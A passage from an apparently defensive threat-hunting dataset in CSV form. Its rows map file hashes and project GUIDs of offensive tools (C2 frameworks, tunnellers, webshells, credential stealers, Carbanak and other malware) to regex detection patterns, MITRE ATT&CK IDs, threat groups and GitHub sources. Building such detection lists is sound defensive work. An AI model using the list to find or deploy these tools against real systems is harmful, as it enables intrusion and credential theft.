(included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#filehash","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","24956" "*3b730f6be970c1671b68792fe163427a15e0fa4426b1d635d9f7e74872f91a7d*",".{0,1000}3b730f6be970c1671b68792fe163427a15e0fa4426b1d635d9f7e74872f91a7d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24957" "*3b73d2414403cb76345c4885921348b96a63499c04027df1cba8b9825959bc1e*",".{0,1000}3b73d2414403cb76345c4885921348b96a63499c04027df1cba8b9825959bc1e.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","24958" "*3b765fc9d51180b7ff8c93aa1ab9369fdff33f5ec4ebc4c2e913f8355ca12903*",".{0,1000}3b765fc9d51180b7ff8c93aa1ab9369fdff33f5ec4ebc4c2e913f8355ca12903.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr.
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#filehash","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","24959" "*3b7eb2083f99deb0f6d2d64030f6ca6ec26e643226d981f7294b0c5340eaa733*",".{0,1000}3b7eb2083f99deb0f6d2d64030f6ca6ec26e643226d981f7294b0c5340eaa733.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#filehash","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","24961" "*3B85D7A9-6BD0-4CD8-9009-36554EF24D32*",".{0,1000}3B85D7A9\-6BD0\-4CD8\-9009\-36554EF24D32.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24962" "*3b8b9d91a8ddd3d98da746d79aed9a4f21f5b92eb2ff650e7014f924a0f4c0fc*",".{0,1000}3b8b9d91a8ddd3d98da746d79aed9a4f21f5b92eb2ff650e7014f924a0f4c0fc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24964" "*3ba0023aaa84e8e4e063da17b60752631776d3b61646c026cf05c4a1b44c04bf*",".{0,1000}3ba0023aaa84e8e4e063da17b60752631776d3b61646c026cf05c4a1b44c04bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24968" "*3ba3ce7c16fd05a1f6bff952c91a537157a4c901575f0d46fadb141c2c8a6842*",".{0,1000}3ba3ce7c16fd05a1f6bff952c91a537157a4c901575f0d46fadb141c2c8a6842.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","24970" "*3ba5a2d4b11f562ab3da3fc87c2889a16523833ba4ede090ffed40a20e643ed9*",".{0,1000}3ba5a2d4b11f562ab3da3fc87c2889a16523833ba4ede090ffed40a20e643ed9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24971" 
"*3ba7ec45c5017f57077a98ed61ce1f24dacddfb4928c20351aba2c0ae4398e39*",".{0,1000}3ba7ec45c5017f57077a98ed61ce1f24dacddfb4928c20351aba2c0ae4398e39.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","24972" "*3BB0CD58-487C-4FEC-8001-607599477158*",".{0,1000}3BB0CD58\-487C\-4FEC\-8001\-607599477158.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","#GUIDproject","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","24976" "*3bb553cd-0a48-402d-9812-8daff60ac628*",".{0,1000}3bb553cd\-0a48\-402d\-9812\-8daff60ac628.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","#GUIDproject","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","24977" "*3bb722c6626dae00c3f31a30738761b013d0413b0adac000e7a783fe5cfc4613*",".{0,1000}3bb722c6626dae00c3f31a30738761b013d0413b0adac000e7a783fe5cfc4613.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24978" 
"*3bb82ba795352c150f16bb53c7c457583dcfe44227e693402aa88b80289c0197*",".{0,1000}3bb82ba795352c150f16bb53c7c457583dcfe44227e693402aa88b80289c0197.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","24979" "*3bc2220dcc58819a4a959b434678da39a94f5b03b46779123a5c341f2699dc6c*",".{0,1000}3bc2220dcc58819a4a959b434678da39a94f5b03b46779123a5c341f2699dc6c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24981" "*3bc3143560646803229345fded4a48e904c9e5d1a446c7f9163d7e0010e5dda5*",".{0,1000}3bc3143560646803229345fded4a48e904c9e5d1a446c7f9163d7e0010e5dda5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24982" "*3bcdf1c4ea5d312b3cd0fab543836f842e6121997c9ef1ac2c68e68779745213*",".{0,1000}3bcdf1c4ea5d312b3cd0fab543836f842e6121997c9ef1ac2c68e68779745213.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24984" "*3bce7350a70402df5ef6e8b12120ec12151bb3d3c6ae0e7b9eb9c1708acc50d6*",".{0,1000}3bce7350a70402df5ef6e8b12120ec12151bb3d3c6ae0e7b9eb9c1708acc50d6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24985" "*3bd0f9a391c4fec2f65e713974067e8bdb3d99388e5f20b50c0ce867c7a5eb45*",".{0,1000}3bd0f9a391c4fec2f65e713974067e8bdb3d99388e5f20b50c0ce867c7a5eb45.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#filehash","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","24986" "*3bd5e92bb40161c47fc8610c85646cb66b3de7e121e4fd03789772441a06c858*",".{0,1000}3bd5e92bb40161c47fc8610c85646cb66b3de7e121e4fd03789772441a06c858.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24988" "*3be05874bbab1a8400a6f8ad7ff13f7496513d0eff1620de74b7192eff2327ae*",".{0,1000}3be05874bbab1a8400a6f8ad7ff13f7496513d0eff1620de74b7192eff2327ae.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24990" "*3be291169fca84dbccbddc5a5884152cc1c8eed62d4d0ad70bb66be6a10e7456*",".{0,1000}3be291169fca84dbccbddc5a5884152cc1c8eed62d4d0ad70bb66be6a10e7456.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24992" "*3be874d1451d77eb17c7d8bacd59fd079959385e17068fbb66481e68a7f316ef*",".{0,1000}3be874d1451d77eb17c7d8bacd59fd079959385e17068fbb66481e68a7f316ef.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24993" 
"*3BEF8A16-981F-4C65-8AE7-C612B46BE446*",".{0,1000}3BEF8A16\-981F\-4C65\-8AE7\-C612B46BE446.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#GUIDproject","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","24995" "*3bf103c2c2f275c75c34f519c26b72143b038f4b31ae7c2d99e9ffd30bb07761*",".{0,1000}3bf103c2c2f275c75c34f519c26b72143b038f4b31ae7c2d99e9ffd30bb07761.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","24996" "*3bf281b68fa29aece79cd0126a3b4552720cefe1045dc974b82523e439a11694*",".{0,1000}3bf281b68fa29aece79cd0126a3b4552720cefe1045dc974b82523e439a11694.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#filehash","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","24997" 
"*3bf8610241a808e85e6ebaac2bb92ba4ae92c3ec1a6e56e21937efec71ea5425*",".{0,1000}3bf8610241a808e85e6ebaac2bb92ba4ae92c3ec1a6e56e21937efec71ea5425.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","24999" "*3bfec62c094366844c3e4c0e257e01678f55ef5b*",".{0,1000}3bfec62c094366844c3e4c0e257e01678f55ef5b.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","25000" "*3c00990e4f6c4e621ae80638b66ceb60e39ebe727d7f91d36e99a5aef53f6359*",".{0,1000}3c00990e4f6c4e621ae80638b66ceb60e39ebe727d7f91d36e99a5aef53f6359.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25001" "*3c02853e5ddae494fd654fc0b44687f5c45a03092f6a2594725b8589928e645e*",".{0,1000}3c02853e5ddae494fd654fc0b44687f5c45a03092f6a2594725b8589928e645e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25002" "*3C0E89F1-1D3D-4651-9A44-FCCABB340E02*",".{0,1000}3C0E89F1\-1D3D\-4651\-9A44\-FCCABB340E02.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","25003" "*3c145dbeaaca5c563c4fe634cd41deeab29712834d4bbf324e0268aded1013c7*",".{0,1000}3c145dbeaaca5c563c4fe634cd41deeab29712834d4bbf324e0268aded1013c7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25006" "*3c1785d7fa372507bd98842717b7bc12744b15f7a7a97856790f664561c959c2*",".{0,1000}3c1785d7fa372507bd98842717b7bc12744b15f7a7a97856790f664561c959c2.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25007" "*3C21F82B-B958-457A-82BB-B8A795316D3D*",".{0,1000}3C21F82B\-B958\-457A\-82BB\-B8A795316D3D.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC 
Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","25009" "*3c27eb99e32086b700d73f8153e53bc24ba62f08936b1be36b6611c5704a067a*",".{0,1000}3c27eb99e32086b700d73f8153e53bc24ba62f08936b1be36b6611c5704a067a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25010" "*3c27f3968cf79a0b5e9402eea64b259d0b4e22d08932281a20ff9a67a472911c*",".{0,1000}3c27f3968cf79a0b5e9402eea64b259d0b4e22d08932281a20ff9a67a472911c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25011" "*3c2d248fa4df74a0a05d7bdfba9a4796938c20fed174912c2a35c7c97e22f7e3*",".{0,1000}3c2d248fa4df74a0a05d7bdfba9a4796938c20fed174912c2a35c7c97e22f7e3.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ""all in one"" 
Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#filehash","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","25012" "*3c2ff027b13ba2b710d9ce7055cebd5e220b2713b12c765598bf0bcef9dc3cef*",".{0,1000}3c2ff027b13ba2b710d9ce7055cebd5e220b2713b12c765598bf0bcef9dc3cef.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","25013" "*3c3361267404dc1dc47eaac52cd347c8c4a408f0ca3bf2da2ffb9152a85a1555*",".{0,1000}3c3361267404dc1dc47eaac52cd347c8c4a408f0ca3bf2da2ffb9152a85a1555.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25014" "*3c36e9e5780af17be16e0326c606e466f39cc9a736c3ecb2e8e965d00c9b56d0*",".{0,1000}3c36e9e5780af17be16e0326c606e466f39cc9a736c3ecb2e8e965d00c9b56d0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25015" "*3c39207a61a348efa7dd2db2d85c1e562beedfa8c4593d1d29b7751bc84aad85*",".{0,1000}3c39207a61a348efa7dd2db2d85c1e562beedfa8c4593d1d29b7751bc84aad85.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","25016" "*3c3a96d02e34589d314b230c417b122970e492282767211866c8ac042e8bd556*",".{0,1000}3c3a96d02e34589d314b230c417b122970e492282767211866c8ac042e8bd556.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#filehash","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","25017" "*3c40fcf023afe126e8cc67593d21bc3ee9af7c56e3f1b8e9614cfd58030c29af*",".{0,1000}3c40fcf023afe126e8cc67593d21bc3ee9af7c56e3f1b8e9614cfd58030c29af.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","25018" "*3c43abec5368c3917c777012e70ae7977f80f170ff3bd0400b907fad09b8acc1*",".{0,1000}3c43abec5368c3917c777012e70ae7977f80f170ff3bd0400b907fad09b8acc1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - 
TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25019" "*3c4ba52ba41f4b7f3d87a8817dcb01838345e9bf1bd574aab09041905d5bde82*",".{0,1000}3c4ba52ba41f4b7f3d87a8817dcb01838345e9bf1bd574aab09041905d5bde82.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25020" "*3c4e36ce4e07e00a125f6ed01fc6797bac0c7e5ef415b4af08ca024dbb8af7de*",".{0,1000}3c4e36ce4e07e00a125f6ed01fc6797bac0c7e5ef415b4af08ca024dbb8af7de.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25021" "*3c4f49964a9cdf416005fa4a4cd54b5130cca78b0b810e5122ad0870f474fb49*",".{0,1000}3c4f49964a9cdf416005fa4a4cd54b5130cca78b0b810e5122ad0870f474fb49.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25023" "*3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012*",".{0,1000}3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - 
T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","#filehash","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","25024" "*3c59dc54401bcc15c44acc94ce543f7f3e40b164a12815892487aa137b1f4fc7*",".{0,1000}3c59dc54401bcc15c44acc94ce543f7f3e40b164a12815892487aa137b1f4fc7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25027" "*3c5d50fa8f74bb4bf13e8b086490bc1d520b0a03b56e8d2b2f3ef65bbab2486a*",".{0,1000}3c5d50fa8f74bb4bf13e8b086490bc1d520b0a03b56e8d2b2f3ef65bbab2486a.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25029" "*3c5ecbc3edd1993243b38576c7b2a1ac16ba7b1ed5194f2cb8daf4a45fd51690*",".{0,1000}3c5ecbc3edd1993243b38576c7b2a1ac16ba7b1ed5194f2cb8daf4a45fd51690.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - 